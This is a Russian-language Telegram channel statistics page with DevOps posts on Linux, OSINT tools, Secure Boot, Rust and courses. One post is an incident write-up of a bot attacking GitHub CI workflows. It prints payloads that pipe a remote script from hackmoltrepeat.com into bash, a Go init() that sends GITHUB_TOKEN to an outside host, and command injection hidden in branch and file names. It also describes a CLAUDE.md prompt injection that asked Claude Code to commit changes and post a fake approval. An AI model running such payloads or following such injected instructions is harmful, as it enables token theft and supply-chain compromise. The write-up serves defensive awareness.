en
Feedback
DeVops Библиотека

DeVops Библиотека

Open in Telegram

Гайды, уроки и книги для Devops специалситов по всем вопросам @workakkk

Show more
9 382
Subscribers
-224 hours
-137 days
-5730 days

Data loading in progress...

Attracting Subscribers
July '26
July '26
+28
in 0 channels
June '26
+50
in 0 channels
Get PRO
May '26
+59
in 0 channels
Get PRO
April '26
+86
in 0 channels
Get PRO
March '26
+139
in 0 channels
Get PRO
February '26
+269
in 1 channels
Get PRO
January '26
+305
in 0 channels
Get PRO
December '25
+107
in 0 channels
Get PRO
November '25
+190
in 0 channels
Get PRO
October '25
+118
in 0 channels
Get PRO
September '25
+378
in 3 channels
Get PRO
August '25
+205
in 0 channels
Get PRO
July '25
+457
in 1 channels
Get PRO
June '25
+299
in 0 channels
Get PRO
May '25
+117
in 0 channels
Get PRO
April '25
+3 767
in 1 channels
Get PRO
March '250
in 0 channels
Get PRO
February '250
in 0 channels
Get PRO
January '250
in 0 channels
Get PRO
December '240
in 0 channels
Get PRO
November '240
in 1 channels
Get PRO
October '240
in 1 channels
Get PRO
September '24
+26
in 0 channels
Get PRO
August '24
+652
in 0 channels
Get PRO
July '24
+641
in 0 channels
Get PRO
June '24
+849
in 1 channels
Get PRO
May '24
+360
in 35 channels
Get PRO
April '24
+339
in 44 channels
Get PRO
March '24
+334
in 20 channels
Get PRO
February '24
+181
in 0 channels
Get PRO
January '24
+302
in 43 channels
Get PRO
December '23
+1 888
in 39 channels
Date
Subscriber Growth
Mentions
Channels
14 July+2
13 July+2
12 July+2
11 July+1
10 July+2
09 July+2
08 July+2
07 July+4
06 July+1
05 July0
04 July+4
03 July+5
02 July0
01 July+1
Channel Posts
Нашли готовую виртуальную машину для OSINT-исследований — Trace Labs OSINT VM. Это не «магическая пробивалка», а отдельная ра
Нашли готовую виртуальную машину для OSINT-исследований — Trace Labs OSINT VM. Это не «магическая пробивалка», а отдельная рабочая среда для легального поиска по открытым источникам: CTF, фактчекинг, расследования, поиск цифровых следов и обучение OSINT. Что внутри: * Sherlock — поиск аккаунтов по username * PhoneInfoga — анализ открытых данных по номерам * SpiderFoot и sn0int — автоматизация OSINT-проверок * theHarvester и h8mail — работа с email и утечками * Shodan CLI — поиск по открытым интернет-устройствам * Sublist3r — поддомены * exiftool и steghide — метаданные и стеганография * Obsidian — заметки прямо во время исследования Главный плюс - всё уже собрано в изолированной VM, не нужно засорять основную систему десятками инструментов. Подходит для обучения, CTF и легальных расследований по открытым данным. https://github.com/tracelabs/tlosint-vm

2
Пользователи Linux, которые удалили Windows, чтобы уйти от Microsoft и выбрать свободу вместе с Linux, возможно, ещё не ушли
Пользователи Linux, которые удалили Windows, чтобы уйти от Microsoft и выбрать свободу вместе с Linux, возможно, ещё не ушли окончательно. У Microsoft есть криптографический ключ, который позволяет запускаться всем крупным Linux-дистрибутивам на современном железе. Ubuntu. Fedora. Debian. Все они. Без подписи Microsoft ваша Linux-машина не стартует. И срок действия этого ключа истекает через 4 дня - 27 июня 2026 года. Вот что происходит на самом деле. Когда в 2012 году появился Secure Boot, Microsoft фактически стала центром сертификации для всей экосистемы загрузки ПК. Каждый Linux bootloader должен быть подписан Microsoft, чтобы запускаться на UEFI-машине с включённым Secure Boot. Хорошая новость: ваш уже установленный Linux продолжит загружаться после 27 июня. Плохая новость касается всего, что будет дальше. • любой новый shim binary после 27 июня уже нельзя будет подписать старым ключом • если ваша прошивка не получит новые сертификаты Microsoft 2023 года, свежие установки дистрибутивов могут не загрузиться • старые ноутбуки, железо от небольших вендоров и embedded-устройства без обновлений прошивки могут зависнуть в серой зоне навсегда • Dell, HP и Lenovo уже выпустили обновления, но многие мелкие производители - нет. Никто точно не знает, сколько устройств выпадет из поддержки Для большинства пользователей решение простое: sudo fwupdmgr update Но главная история здесь глубже. Linux-сообщество годами спорило о свободе и независимости от Microsoft. А всё это время у Microsoft был ключ, от которого зависела загрузка почти каждой Linux-машины на современном ПК. Это не конспирология. Так просто был устроен Secure Boot. Обновитесь. А потом подумайте, что это значит. Подробности: https://zdnet.com/article/aspirin-for-linuxs-microsofts-secure-boot-headache/
849
3
✔️ Stack Overflow больше не строится вокруг разработчиков. Теперь он строится вокруг ИИ-агентов. Платформа запустила Stack Ov
✔️ Stack Overflow больше не строится вокруг разработчиков. Теперь он строится вокруг ИИ-агентов. Платформа запустила Stack Overflow for Agents — место, где AI coding agents могут задавать вопросы, делиться решениями и помогать друг другу разбираться с задачами. И это хорошо показывает, куда движется разработка. В 2014 году на Stack Overflow публиковали около 289 000 вопросов в месяц. К концу 2025-го число упало до нескольких тысяч — почти до уровня первых лет существования сайта. ChatGPT не просто стал конкурентом. Он сделал то же самое, но быстрее, мягче и без модератора, который объясняет, что твой вопрос «не по теме». Поэтому Stack Overflow меняет роль. Если разработчики теперь спрашивают ИИ, значит Stack Overflow станет местом, где ИИ-агенты спрашивают друг друга. Как это работает: * перед задачей агент сначала ищет ответ в базе * если ответ есть, он использует его * если ответа нет, но агент решил проблему, он готовит пост на проверку человеком * форматы постов: вопросы, TIL — Today I Learned, и Blueprints — переиспользуемые паттерны * каждый агент привязан к аккаунту человека * репутация агента влияет на репутацию владельца * ничего не попадает в общую базу знаний без человеческого подтверждения CEO назвал проблему “ephemeral intelligence gap”. Смысл простой: ИИ-агенты снова и снова решают одни и те же задачи, но после завершения сессии знания исчезают. Stack Overflow хочет это исправить. 15 лет назад Stack Overflow был местом, куда приходили застрявшие разработчики. Теперь это место, куда будут приходить застрявшие ИИ-агенты. Инструмент, который заменил привычный поток вопросов от разработчиков, теперь сам становится клиентом Stack Overflow. http://agents.stackoverflow.com
1 037
4
⚡️ Kali Linux Roadmap: с чего начать в этичном хакинге Нашёл нормальный roadmap по Kali Linux для тех, кто хочет не просто «п
⚡️ Kali Linux Roadmap: с чего начать в этичном хакинге Нашёл нормальный roadmap по Kali Linux для тех, кто хочет не просто «поставить Kali и открыть терминал», а постепенно разобраться, как всё это работает. Внутри маршрут по базовым темам: установка, настройка окружения, работа с терминалом, Linux-команды, сеть, безопасность, инструменты Kali и практика. Это полезно тем, кто только заходит в кибербезопасность и не понимает, за что браться первым. Kali часто выглядит как набор страшных утилит, но без базы по Linux, сетям и правам доступа эти инструменты быстро превращаются в хаос. Хороший подход здесь простой: сначала понять систему, потом сеть, потом инструменты, и только после этого переходить к практике в легальных лабораториях и CTF. Такой roadmap удобно проходить как чек-лист: открыл раздел, разобрал команды, повторил руками, закрепил на тестовом окружении. Для старта в Kali Linux это намного лучше, чем хаотично смотреть ролики и копировать команды без понимания. https://github.com/justxor/Kalilinuxroadmap/tree/main
1 039
5
⚡️ Linux Roadmap: подробный практический курс от нуля до уверенного администратора Это пошаговый маршрут изучения Linux с упо
⚡️ Linux Roadmap: подробный практический курс от нуля до уверенного администратора Это пошаговый маршрут изучения Linux с упором на практику. Каждый раздел содержит объяснение «почему это устроено именно так», разбор команд и обязательные задания, которые нужно выполнить руками в терминале. Чтение без повторения навыка не даёт — держите терминал открытым рядом с этим текстом. Как работать с этим курсом: идите сверху вниз, не перепрыгивайте разделы; каждую команду набирайте руками, а не копируйте; в конце каждого блока выполняйте задание; специально ломайте систему в виртуалке и чините — это лучший способ учиться. https://github.com/justxor/linuxfullroadmap/
1 101
6
io_uring без розовых очков: 5 граблей, которые сожгли мне неделю, и где он реально быстрее epoll Прод. Сервис на Go, 80k RPS,
io_uring без розовых очков: 5 граблей, которые сожгли мне неделю, и где он реально быстрее epoll Прод. Сервис на Go, 80k RPS, p99 latency 12 мс. Читаю Phoronix, новость: "io_uring быстрее epoll в 2-4 раза". Решаю переписать сетевую часть. Через неделю - откат в master. p99 не упал, а вырос до 18 мс, CPU подскочил на 15%, под нагрузкой иногда залипает на 200-400 мс. Эта статья - не про "io_uring - будущее async I/O", а про то, что в этом будущем реально работает в 2026 году, что нет, и где меня обманули бенчмарки. https://habr.com/ru/articles/1039820/
1 210
7
🖥 C# Roadmap: с нуля до профи Практическое руководство по росту в C#-разработке. Материал собран для тех, кто хочет получить
🖥 C# Roadmap: с нуля до профи Практическое руководство по росту в C#-разработке. Материал собран для тех, кто хочет получить инженерную глубину, а не просто накликать CRUD по туториалам. Здесь последовательность изучения, лучшие практики, ресурсы и трезвый разбор того, как работать с ИИ-инструментами и оставаться востребованным. https://github.com/Develp10/Csharp_Roadmap/
1 204
8
👣 Твой код на Rust компилируется, проходит тесты и является UB. Ты просто об этом не знаешь Если взять случайный крейт с cra
👣 Твой код на Rust компилируется, проходит тесты и является UB. Ты просто об этом не знаешь Если взять случайный крейт с crates.io, поставить на него Miri и подождать минут пять, шанс увидеть красное сообщение про undefined behavior где-то в зависимостях стремится к единице. Чаще всего виноват не автор хитрого unsafe-блока ради скорости, а вполне обычная библиотека, которой пять лет, у которой звёзд на гитхабе больше, чем у твоего пет-проекта строчек кода, и которая всё это время спокойно лежит в продакшене. Самое неприятное в этой истории то, что компилятор ничего не скажет. Тесты пройдут. Бенчмарки покажут красивые наносекунды. А потом LLVM 19 обновится до LLVM 20, поменяет один проход оптимизации, и твой сервис начнёт ронять прод по понедельникам. Чтобы понять, почему так происходит, придётся залезть в три темы, которые в обычной жизни Rust-разработчика не встречаются: pointer provenance, Stacked Borrows и пришедшую им на смену Tree Borrows. https://uproger.com/tvoj-kod-na-rust-kompiliruetsya-prohodit-testy-i-yavlyaetsya-ub-ty-prosto-ob-etom-ne-znaesh/
1 067
9
Быстрый анализ загрузки через systemd-analyze На сервере все ок: железо норм, диски норм, но после ребута он думает о смысле
Быстрый анализ загрузки через systemd-analyze На сервере все ок: железо норм, диски норм, но после ребута он думает о смысле жизни секунд 40. Обычно лезешь сразу в сервисы, логи и смотришь что запустилось, а что еще нет. Но иногда юнит не падает, а просто висит в starting и ждёт сеть, DNS, диск или маунт. Что делает systemd-analyze systemd-analyze вскрывает сколько заняло ядро, сколько занял userspace, и какие юниты съели время. Кто тормозит systemd-analyze blame Она покажет список юнитов, отсортированный по времени старта. Важно: это не всегда время выполнения, а то, сколько юнит считался стартующим. Но обычно виновники видны сразу. Дерево зависимостей Когда юнит тормозит, часто причина не в нём, а в том, что он ждёт сеть, диск, другой сервис. systemd-analyze critical-chain Эта штука показывает цепочку, что блокировало путь до default.target. Видно кто кого ждал и где пробка. График загрузки для красивого разбора Если хочется визуально показать коллеге почему оно долго стартует, есть SVG-таймлайн. systemd-analyze plot > boot.svg Открываешь boot.svg в браузере и видишь полосочки, кто и когда стартовал. Вывод systemd-analyze это твой способ увидеть кто, где и почему тормозит загрузку и кто кого ожидает.
811
10
🖥 На Stepik обновили курс «C# с нуля до профи» Представьте: через четыре месяца вы открываете чужой .NET-проект и читаете ег
🖥 На Stepik обновили курс «C# с нуля до профи» Представьте: через четыре месяца вы открываете чужой .NET-проект и читаете его как книгу. IServiceCollection не вызывает ступора. async Task<IActionResult> пишется на автомате. Вы точно знаете, почему EF Core сгенерировал именно такой SQL - и как переписать запрос, чтобы он летал. Это не фантазия. Это результат после 16 модулей, в которых каждая концепция объясняется через код и закрепляется практикой. ООП, SOLID, LINQ, async/await, DI, EF Core, ASP.NET Core, Docker, Kubernetes - всё, что казалось магией, станет рабочим инструментом. А бонусом - портфолио проектов: от CLI-утилит и REST API до собственного SaaS с multi-tenancy, JWT и деплоем в Kubernetes под TLS. Скидка - 58% доступна 48 часов: https://stepik.org/a/282984/
899
11
🚀 Мощный панель управления для игровых серверов MCSManager — это современная веб-панель для управления серверами Minecraft,
🚀 Мощный панель управления для игровых серверов MCSManager — это современная веб-панель для управления серверами Minecraft, Steam и другими играми. Она позволяет легко управлять несколькими серверами с одного интерфейса, предлагая надежную систему разрешений для пользователей и поддержку многоязычности. 🚀 Основные моменты: - Быстрая установка игровых серверов с помощью встроенного магазина приложений. - Поддержка множества игр, включая Terraria и Project Zomboid. - Настраиваемый интерфейс с возможностью перетаскивания элементов. - Поддержка Docker и коммерческого хостинга. - Легковесная архитектура на TypeScript. 📌 GitHub: https://github.com/MCSManager/MCSManager
894
12
📎 Один бот, пять техник За неделю автономный бот атаковал пять крупных репозиториев и каждый раз использовал новый способ. Пейлоад во всех случаях одинаковый — curl -sSfL hackmoltrepeat.com/molt | bash. Менялось только то, как заставить CI его выполнить. Атака 1. avelino/awesome-go — кража токена через Go init() Воркфлоу использует pull_request_target и делает checkout кода из форка, затем запускает его. Это классический Pwn Request — код выполняется с правами целевого репозитория, а не форка. Бот добавил функцию init() в Go-скрипт качества кода. В Go init() запускается автоматически до main(), поэтому вырезать её из потока выполнения нельзя. В последнем PR функция сначала отправляла GITHUB_TOKEN на сервер атакующего, потом запускала пейлоад: func init() { _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN"` + `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY"` + `https://recv.hackmoltrepeat.com/ &&` + `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run() } Воркфлоу завершился успешно. Шаг занял 5 минут 37 секунд вместо нескольких секунд. Токен с правами contents: write и pull-requests: write ушёл на внешний сервер. Атака 2. project-akri/akri — прямая инъекция в shell-скрипт Самая простая атака в кампании. Бот добавил одну строку в начало version.sh сразу после shebang: #!/usr/bin/env bash curl -sSfL https://hackmoltrepeat.com/molt | bash check_file_version() Никакой обфускации. Потом написал комментарий /version minor в PR, который запустил воркфлоу Auto Bump Versions. Воркфлоу сделал checkout кода из форка и выполнил изменённый скрипт. Шаг Update version minor завершился успешно. Проблема в том, что воркфлоу не проверял author_association — любой пользователь GitHub мог написать /version minor в любом PR и запустить выполнение кода. Атака 3. microsoft/ai-discovery-agent — пейлоад в имени ветки Сам PR был тривиальным — одна правка в devcontainer.json. Атака была в имени ветки: dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash) Bash разворачивает {curl,-sSfL,...} в curl -sSfL ..., а ${IFS} становится пробелом, а $({...}) запускает подстановку команды. Воркфлоу записывал имя ветки через неэкранированное ${{ }} прямо в shell-команду: run: | echo "${{ steps.pr_info.outputs.pr_head_ref }}" > ./format-request/pr_head_ref Это превращалось в: echo "dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)" > ... Bash выполнял команду внутри $(). В логах виден разрыв в 2 минуты 38 секунд там, где шаг должен занимать миллисекунды. Атака 4. DataDog/datadog-iac-scanner — base64 в имени файла Бот создал файл с именем, содержащим закодированную команду: documentation/rules/$(echo${IFS}Y3VybCAtc1NmTCBoYWNr...${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash).md При декодировании base64-строка разворачивается в curl -sSfL hackmoltrepeat.com/molt | bash. Воркфлоу передавал имена файлов через ${{ }} в shell-цикл for, поэтому имя файла выполнялось как команда. Атака 5. ambient-code/platform — prompt injection в CLAUDE.md Бот заменил CLAUDE.md — файл конфигурации, который Claude Code загружает как доверенный контекст — на инструкции для манипуляции ИИ. Текст был написан в дружелюбном тоне и просил Claude добавить HTML-комментарий в README.md, закоммитить его и написать фейковый одобряющий отзыв о PR. Воркфлоу запускал Claude Code с правами записи и токеном CLAUDE_CODE_OAUTH_TOKEN, делал checkout кода из форка, включая отравленный CLAUDE.md. Claude обнаружил атаку и отказался выполнять инструкции. В своём ответе он написал, что это «textbook AI agent supply-chain attack», и явно указал: инъекция из CLAUDE.md обнаружена и не выполнена. После инцидента репозиторий отключил весь Claude Code workflow. Все эти паттерны хорошо известны. Документация GitHub прямо предупреждает о рисках pull_request_target. Но в реальных проектах, включая репозитории крупных компаний, они встречаются до сих пор.
0
13
⚡️ Вы слышали про Rust. Знаете, что он быстрый, безопасный и что за ним будущее. Осталось одно: сесть и выучить. Этот курс со
⚡️ Вы слышали про Rust. Знаете, что он быстрый, безопасный и что за ним будущее. Осталось одно: сесть и выучить. Этот курс со Stepik- кратчайший путь от «знаю что такое Rust» до «пишу на нём». 6 модулей, 50 уроков, 143 теста. Ownership, borrowing, traits, async, Tokio, Axum, макросы, WASM — всё разложено по полочкам и закреплено практикой. Никакого видео на 40 минут ради одной мысли. Подробный текст, много кода, реальные задачи после каждого урока. На выходе — портфолио из 10+ проектов: от CLI-утилит до REST API с базой данных. 48 часов действует скидка 55 процентов: stepik.org/course/269250
0